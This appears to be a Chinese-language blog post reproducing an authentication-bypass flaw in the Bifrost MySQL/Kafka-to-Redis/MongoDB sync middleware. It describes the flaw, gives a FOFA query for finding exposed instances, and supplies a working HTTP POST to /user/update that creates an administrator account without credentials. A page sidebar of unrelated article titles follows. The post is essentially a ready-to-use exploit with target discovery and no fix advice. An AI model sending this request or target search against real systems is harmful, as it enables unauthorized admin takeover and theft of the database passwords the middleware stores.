Bifrost 中间件 X-Requested-With 系统身份认证绕过漏洞复现

0x01 产品简介

Bifrost是一款面向生产环境的 MySQL,MariaDB,kafka 同步到Redis,MongoDB,ClickHouse等服务的异构中间件

0x02 漏洞概述

Bifrost 中间件 X-Requested-With 存在身份认证绕过漏洞,未经身份认证的攻击者可未授权创建管理员权限账号,可通过删除请求头实现身份认证绕过,获取环境内配置各种数据库账户密码。

0x03 复现环境

FOFA:body="/dologin" && body="Bifrost"

0x04 漏洞复现

PoC

POST /user/update HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip

{"UserName":"user","Password":"password","Group":"administrator","Host":""}

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-18 02:44:07       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-18 02:44:07       100 阅读
  3. 在Django里面运行非项目文件

    2023-12-18 02:44:07       82 阅读
  4. Python语言-面向对象

    2023-12-18 02:44:07       91 阅读

热门阅读

  1. unknown error 1146

    2023-12-18 02:44:07       55 阅读
  2. Mysql(事务)

    2023-12-18 02:44:07       78 阅读
  3. 什么是容器编排?

    2023-12-18 02:44:07       70 阅读
  4. 【无标题】

    2023-12-18 02:44:07       69 阅读
  5. 【前端学习记录】Vuex状态管理学习笔记

    2023-12-18 02:44:07       65 阅读
  6. LeetCode27.移除数组元素

    2023-12-18 02:44:07       71 阅读
  7. 骑砍战团MOD开发(19)-ID掩码算法

    2023-12-18 02:44:07       61 阅读
  8. Ubuntu20.04 配置NTP服务器

    2023-12-18 02:44:07       54 阅读
  9. LeetCode 1. 两数之和

    2023-12-18 02:44:07       82 阅读
  10. leetcode142.环形链表II

    2023-12-18 02:44:07       70 阅读